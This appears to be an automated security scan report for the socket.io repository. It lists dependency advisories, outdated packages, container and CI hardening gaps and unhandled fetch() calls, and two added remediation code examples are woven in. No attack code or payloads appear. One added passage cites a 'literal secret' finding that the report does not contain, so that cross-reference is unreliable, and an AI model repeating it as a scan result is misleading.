medium Security checks software dependencies conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-f23m-r3pf-42rh
lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-xxjr-mmjv-4gpg
Lodash has Prototype Pollution Vulnerability in `_.unset` and `_.omit` functions
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 micromatch: GHSA-952p-6rrq-rcjv
Regular Expression Denial of Service (ReDoS) in micromatch
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 minimist: GHSA-vh95-rmgr-6w4m
Prototype Pollution in minimist
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 ms: GHSA-w9mr-4mfr-499f
Vercel ms Inefficient Regular Expression Complexity vulnerability
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-65ch-62r8-g69g
node-forge is vulnerable to ASN.1 OID Integer Truncation
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-alias` is 1 major version(s) behind (5.1.0 -> 6.0.0)
`@rollup/plugin-alias` is pinned/resolved at 5.1.0 but the latest stable release on the npm registry is 6.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-babel` is 1 major version(s) behind (6.0.4 -> 7.1.0)
`@rollup/plugin-babel` is pinned/resolved at 6.0.4 but the latest stable release on the npm registry is 7.1.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-commonjs` is 3 major version(s) behind (26.0.1 -> 29.0.3)
`@rollup/plugin-commonjs` is pinned/resolved at 26.0.1 but the latest stable release on the npm registry is 29.0.3 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-node-resolve` is 1 major version(s) behind (15.2.3 -> 16.0.3)
`@rollup/plugin-node-resolve` is pinned/resolved at 15.2.3 but the latest stable release on the npm registry is 16.0.3 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update…
package.json
medium Security checks software dependencies conf 0.90 npm package `@sinonjs/fake-timers` is 4 major version(s) behind (11.2.2 -> 15.4.0)
`@sinonjs/fake-timers` is pinned/resolved at 11.2.2 but the latest stable release on the npm registry is 15.4.0 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs ra…
package.json
medium Security checks software dependencies conf 0.90 npm package `@types/sinonjs__fake-timers` is 7 major version(s) behind (8.1.5 -> 15.0.1)
`@types/sinonjs__fake-timers` is pinned/resolved at 8.1.5 but the latest stable release on the npm registry is 15.0.1 (7 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update …
package.json
medium Security checks software dependencies conf 0.90 3 occurrences npm package `@wdio/sauce-service` is 1 major version(s) behind (8.46.0 -> 9.27.2)
`@wdio/sauce-service` is pinned/resolved at 8.46.0 but the latest stable release on the npm registry is 9.27.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rai…
3 occurrences
package.json (3 hits)
medium Security checks software dependencies conf 0.90 npm package `@wdio/spec-reporter` is 1 major version(s) behind (8.39.0 -> 9.27.2)
`@wdio/spec-reporter` is pinned/resolved at 8.39.0 but the latest stable release on the npm registry is 9.27.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rai…
package.json
medium Security checks software dependencies conf 0.90 npm package `babel-loader` is 1 major version(s) behind (9.1.3 -> 10.1.1)
`babel-loader` is pinned/resolved at 9.1.3 but the latest stable release on the npm registry is 10.1.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `cookie` is 1 major version(s) behind (0.7.2 -> 1.1.1)
`cookie` is pinned/resolved at 0.7.2 but the latest stable release on the npm registry is 1.1.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `eiows` is 2 major version(s) behind (7.1.0 -> 9.2.0)
`eiows` is pinned/resolved at 7.1.0 but the latest stable release on the npm registry is 9.2.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `express` is 1 major version(s) behind (4.21.2 -> 5.2.1)
`express` is pinned/resolved at 4.21.2 but the latest stable release on the npm registry is 5.2.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.88 2 occurrences parseuri: GHSA-6fx8-h7jm-663j
parse-uri Regular expression Denial of Service (ReDoS)
2 files, 2 locations
package-lock.json
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 postcss: GHSA-7fh5-64p2-3v2j
PostCSS line return parsing error
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-qx2v-qp2m-jg93
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks quality Quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt.
.well-known/security.txt
medium Security checks software dependencies conf 0.88 2 occurrences qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 socket.io-parser: GHSA-cqmj-92xf-r6r9
Insufficient validation when decoding a Socket.IO packet
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 socket.io: GHSA-25hc-qcg6-38wj
socket.io has an unhandled 'error' event
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 tough-cookie: GHSA-72xf-g2v4-qvf3
tough-cookie Prototype Pollution vulnerability
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 2 occurrences uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-4v9v-hfq4-rm2v
webpack-dev-server users' source code may be stolen when they access a malicious web site
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-79cf-xcqc-c78w
webpack-dev-server vulnerable to cross-origin source code exposure on non-HTTPS origins
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-9jgg-88mc-972h
webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack: GHSA-4vvj-4cpr-p986
Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 word-wrap: GHSA-j8xg-fqg3-53r7
word-wrap vulnerable to Regular Expression Denial of Service
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 yaml: GHSA-48c2-rrv3-qjmp
yaml is vulnerable to Stack Overflow via deeply nested YAML collections
examples/ReactNativeExample/yarn.lock
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/engine.io-protocol/v3-test-suite/test-suite.js:40
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/engine.io-protocol/v4-test-suite/test-suite.js:52
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/socket.io-protocol/v5-test-suite/test-suite.js:71
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — examples/create-react-app-example/src/serviceWorker.js:103
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io-client/lib/transports/polling-fetch.ts:4
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io-client/test/support/env.js:34
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io/test/common.js:80
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io/test/server.js:1471
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/cluster.ts:47
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/in-memory.ts:72
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/redis.ts:76
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/util.ts:12
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io/client-dist/socket.io.esm.min.js:6
Bare `fetch(...)` returns a promise that rejects on network failure; if nothing handles that rejection it becomes an unhandled rejection, which crashes a Node process by default (browsers only log it to the console). Await the call inside try/catch or attach `.catch(...)`, and pass an AbortSignal with a timeout so a stalled connection fails instead of hanging indefinitely.
runtime safety · Robustness
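The remediation the thirteen `fetch()` findings above ask for, shown as an added example rather than code from socket.io: a wrapper that turns a network error, a non-2xx status and a stalled connection into returned values, so nothing can escape as an unhandled rejection. The URL, the fake `fetch` implementations and the 50 ms timeout are constructed for the demo so it runs offline; `fetchImpl` is an assumed injection point, not a real fetch option.

```javascript
// Added example (not socket.io code): fetch with handled failure and a timeout.
async function safeFetch(url, { timeoutMs = 5000, fetchImpl = globalThis.fetch, ...init } = {}) {
  const controller = new AbortController();
  // A ref'd timer keeps the process alive while we wait. AbortSignal.timeout()
  // is the one-line equivalent on Node 17.3+, but its timer is unref'd.
  const timer = setTimeout(
    () => controller.abort(new Error(`timeout after ${timeoutMs} ms`)),
    timeoutMs,
  );
  try {
    const response = await fetchImpl(url, { ...init, signal: controller.signal });
    if (!response.ok) return { ok: false, reason: 'http', status: response.status };
    return { ok: true, status: response.status, response };
  } catch (error) {
    // fetch rejects with the abort reason once the signal fires, so tell our
    // own timeout apart from a genuine network error.
    const reason = controller.signal.aborted ? 'timeout' : 'network';
    return { ok: false, reason, error };
  } finally {
    clearTimeout(timer);
  }
}

// Constructed stand-ins for fetch; each honours the AbortSignal like the real one.
function fakeFetch(behaviour) {
  return (_url, { signal } = {}) =>
    new Promise((resolve, reject) => {
      if (behaviour === 'network-error') return reject(new TypeError('fetch failed'));
      if (behaviour === 'server-error') return resolve(new Response('nope', { status: 503 }));
      if (behaviour === 'hang') {
        signal.addEventListener('abort', () => reject(signal.reason), { once: true });
        return; // never settles on its own
      }
      resolve(new Response('{"sid":"abc"}', { status: 200 }));
    });
}

// Runs the four cases and returns the outcome of each, keyed by case name.
async function demo() {
  const url = 'http://localhost/engine.io/?EIO=4&transport=polling'; // illustrative only
  const results = {};
  for (const behaviour of ['ok', 'network-error', 'server-error', 'hang']) {
    const r = await safeFetch(url, { fetchImpl: fakeFetch(behaviour), timeoutMs: 50 });
    results[behaviour] = r.ok ? 'ok' : r.reason;
  }
  return results; // { ok: 'ok', 'network-error': 'network', 'server-error': 'http', hang: 'timeout' }
}

demo().then((r) => console.log(r));
```

The result object is the point: callers branch on `reason` instead of letting an exception propagate, and the `hang` case shows why the timeout matters, since without the signal a silent server would leave the promise pending forever rather than rejecting at all.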
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-haproxy/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-httpd/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-nginx/client/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-nginx/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-traefik/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph cicd CI/CD security conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
.github/workflows/publish.yml
CI/CD security · Supply chain · GitHub actions
low Security checks software dependencies conf 0.88 @tootallnate/once: GHSA-vpq2-c234-7xj6
@tootallnate/once vulnerable to Incorrect Control Flow Scoping
examples/create-react-app-example/yarn.lock
low Security checks security auth conf 0.76 [AUC005] No authorization-focused tests detected
No test files with common authorization, ownership, 403, admin, or super_admin assertions were found.
low Security checks software dependencies conf 0.88 axios: GHSA-xhjh-pmcv-23jw
Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams
package-lock.json
high Security checks cicd CI/CD security conf 0.56 17 occurrences Compose service does not declare a runtime user
If the image does not define USER internally, this service may run as root.
5 files, 17 locations
examples/cluster-haproxy/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-httpd/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-nginx/docker-compose.yml:13, 22, 31, 40, 49 (5 hits)
examples/cluster-traefik/docker-compose.yml:14
packages/socket.io-redis-streams-emitter/compose.yaml:11
CI/CD security · containers
high Security checks cicd CI/CD security conf 0.62 17 occurrences Compose service lacks no-new-privileges hardening
no-new-privileges prevents processes from gaining additional privileges through setuid binaries or file capabilities.
5 files, 17 locations
examples/cluster-haproxy/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-httpd/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-nginx/docker-compose.yml:13, 22, 31, 40, 49 (5 hits)
examples/cluster-traefik/docker-compose.yml:14
packages/socket.io-redis-streams-emitter/compose.yaml:11
CI/CD security · containers
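The three Compose findings above (literal secret values in `environment:`, no runtime `user:`, no `no-new-privileges`) can be checked with a few lines of code before a file is committed. The check below is an added example, not socket.io's own tooling: it walks two-space YAML indentation rather than parsing YAML, so it needs no dependency but assumes that conventional layout. Both Compose files, the image names, the `postgres` user and the `pg_isready` healthcheck are constructed for illustration.

```javascript
// Added example (not socket.io code): lint a Compose file for the findings above.
const SECRET_NAME_RE = /(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)/i;

// A hard-coded value; `${VAR}` / `$VAR` references are resolved from the environment.
function isLiteral(value) {
  const v = value.trim().replace(/^["']|["']$/g, '');
  return v !== '' && !v.startsWith('$');
}

function lintCompose(text) {
  const services = new Map();
  let inServices = false;
  let current = null; // service block we are inside
  let section = null; // indent-4 key we are under (environment, security_opt, ...)
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const indent = raw.length - raw.trimStart().length;
    if (indent === 0) { inServices = line === 'services:'; current = null; continue; }
    if (!inServices) continue;
    if (indent === 2 && line.endsWith(':')) {
      current = line.slice(0, -1);
      services.set(current, { user: null, noNewPrivileges: false, literalSecrets: [] });
      section = null;
      continue;
    }
    if (!current) continue;
    const svc = services.get(current);
    if (indent === 4) {
      const m = line.match(/^([\w-]+):\s*(.*)$/);
      section = m ? m[1] : null;
      if (m && m[1] === 'user' && m[2].trim()) svc.user = m[2].trim();
      continue;
    }
    if (/no-new-privileges\s*[:=]\s*true/.test(line)) svc.noNewPrivileges = true;
    if (section === 'environment') {
      // list form `- KEY=value` or map form `KEY: value`
      const m = line.match(/^-?\s*([A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*(.*)$/);
      if (m && SECRET_NAME_RE.test(m[1]) && isLiteral(m[2])) svc.literalSecrets.push(m[1]);
    }
  }
  const findings = [];
  for (const [service, svc] of services) {
    for (const key of svc.literalSecrets) findings.push({ service, check: 'literal-secret', detail: key });
    if (!svc.user) findings.push({ service, check: 'no-user' });
    if (!svc.noNewPrivileges) findings.push({ service, check: 'no-new-privileges' });
  }
  return findings;
}

// Constructed Compose files: the shape the findings describe, then a hardened one.
const BEFORE = `
services:
  db:
    image: postgres:16
    environment:
      POSTGRES_USER: app
      POSTGRES_PASSWORD: changeit
  app:
    image: ghcr.io/example/app:1.0
    environment:
      - DATABASE_URL=postgres://app@db/app
`;

const AFTER = `
services:
  db:
    image: postgres:16
    user: postgres
    security_opt:
      - no-new-privileges:true
    environment:
      POSTGRES_USER: app
      POSTGRES_PASSWORD: \${POSTGRES_PASSWORD:?set it in .env or the shell}
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U app"]
      interval: 5s
  app:
    image: ghcr.io/example/app:1.0
    user: "10001:10001"
    security_opt:
      - no-new-privileges:true
    depends_on:
      db:
        condition: service_healthy
    environment:
      - DATABASE_URL=postgres://app@db/app
      - APP_TOKEN=\${APP_TOKEN:?set APP_TOKEN}
`;

console.log(lintCompose(BEFORE)); // 5 findings; lintCompose(AFTER) is empty
```

The hardened file also carries the healthcheck and `depends_on` condition from the "no healthcheck" finding, even though the checker does not flag their absence. The `${VAR:?message}` form makes `docker compose up` refuse to start with a clear error when the variable is unset, which is the behaviour you want for a secret; for anything beyond a local example, a Docker secret mounted as a file is the better home than an environment variable at all.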
low Security checks software dependencies conf 0.88 cookie: GHSA-pxg6-pf52-xh8x
cookie accepts cookie name, path, and domain with out of bounds characters
examples/basic-crud-application/vue-client/yarn.lock
low Security checks cicd CI/CD security conf 0.72 9 occurrences Database service has no healthcheck
Compose starts dependent containers in dependency order, but it does not wait for a database to be ready unless a healthcheck is defined and dependents use service_healthy.
8 files, 9 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/cluster-engine-redis/compose.yaml:1
examples/cluster-haproxy/docker-compose.yml:49
examples/cluster-httpd/docker-compose.yml:49
examples/cluster-nginx/docker-compose.yml:54
examples/cluster-traefik/docker-compose.yml:23
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
CI/CD securitycontainers
low Security checks software dependencies conf 0.88 debug: GHSA-gxpj-cx7g-858c
Regular Expression Denial of Service in debug
packages/engine.io/examples/latency/package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
low Security checks quality Quality conf 0.60 14 occurrences Duplicated implementation block across source files
Duplicate implementation blocks are maintenance debt. Keep them visible, but they are not a high-severity defect unless the duplicated logic is security-sensitive or drifting.
12 files, 13 locations
packages/socket.io-client/support/rollup.config.umd.js:13, 42 (2 hits)
packages/engine.io-client/support/rollup.config.umd.js:43
packages/engine.io-parser/lib/decodePacket.ts:8
packages/engine.io/lib/transports/polling.ts:124
packages/socket.io-client/support/bundle-size.js:12
packages/socket.io-cluster-engine/lib/redis.ts:76
packages/socket.io-component-emitter/lib/esm/index.js:2
packages/socket.io-parser/wdio.conf.js:7
duplication · quality
low Security checks software dependencies conf 0.88 express: GHSA-qw6h-vgh9-j6wx
express vulnerable to XSS via response.redirect()
examples/basic-crud-application/vue-client/yarn.lock
low Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-fj3w-jwp8-x2g3
fast-xml-parser has stack overflow in XMLBuilder with preserveOrder
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.90 3 occurrences npm package `@babel/preset-env` is 5 minor versions behind (7.24.7 -> 7.29.7)
`@babel/preset-env` is pinned/resolved at 7.24.7 but the latest stable release on the npm registry is 7.29.7 (5 minor versions behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
3 occurrences
package.json (3 hits)
low Security checks software dependencies conf 0.90 npm package `@babel/register` is 5 minor versions behind (7.24.6 -> 7.29.7)
`@babel/register` is pinned/resolved at 7.24.6 but the latest stable release on the npm registry is 7.29.7 (5 minor versions behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 2 occurrences npm package `@fails-components/webtransport-transport-http3-quiche` is 1 minor version behind (1.5.1 -> 1.6.3)
`@fails-components/webtransport-transport-http3-quiche` is pinned/resolved at 1.5.1 but the latest stable release on the npm registry is 1.6.3 (1 minor version behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dep…
2 occurrences
package.json (2 hits)
low Security checks software dependencies conf 0.90 npm package `@socket.io/postgres-adapter` is 4 minor versions behind (0.1.1 -> 0.5.0)
`@socket.io/postgres-adapter` is pinned/resolved at 0.1.1 but the latest stable release on the npm registry is 0.5.0 (4 minor versions behind; for a 0.x package semver makes no compatibility promise across minor versions, so treat the bump as potentially breaking). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs…
package.json
low Security checks software dependencies conf 0.90 npm package `@socket.io/redis-streams-adapter` is 1 minor version behind (0.2.2 -> 0.3.1)
`@socket.io/redis-streams-adapter` is pinned/resolved at 0.2.2 but the latest stable release on the npm registry is 0.3.1 (1 minor version behind; for a 0.x package semver makes no compatibility promise across minor versions, so treat the bump as potentially breaking). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-updat…
package.json
low Security checks software dependencies conf 0.90 npm package `@types/pg` is 5 minor versions behind (8.15.5 -> 8.20.0)
`@types/pg` is pinned/resolved at 8.15.5 but the latest stable release on the npm registry is 8.20.0 (5 minor versions behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.88 on-headers: GHSA-76c9-3jph-rj3q
on-headers is vulnerable to http response header manipulation
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 2 occurrences qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low Security checks quality Quality conf 0.74 robots.txt does not advertise a sitemap
Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly.
examples/create-react-app-example/public/robots.txt
low Security checks software dependencies conf 0.88 send: GHSA-m6fv-jmcg-4jfg
send vulnerable to template injection that can lead to XSS
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 serve-static: GHSA-cm22-4g7w-348p
serve-static vulnerable to template injection that can lead to XSS
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences webpack: GHSA-38r7-794h-5758
webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences webpack: GHSA-8fgc-7cc6-rx7x
webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low System graph quality Maintenance conf 1.00 132 TODO/FIXME markers
High count of TODO/FIXME/HACK markers — track them as issues so they're not forgotten.
low System graph hardware Coverage conf 1.00 Containers defined but no K8s/orchestration manifest found
Repo has Dockerfiles/compose but no Kubernetes/Nomad manifests. If the target deployment is K8s, the manifests may live in a separate ops repo.
Deployment
low System graph hardware Supply chain conf 1.00 5 occurrences Docker base image is tag-pinned but not digest-pinned: node:14-alpine
Container tags can be retagged upstream. Pin production base images to a reviewed digest (`image@sha256:...`) when reproducibility and supply-chain integrity matter.
5 files, 5 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
containers · Pinned dependencies
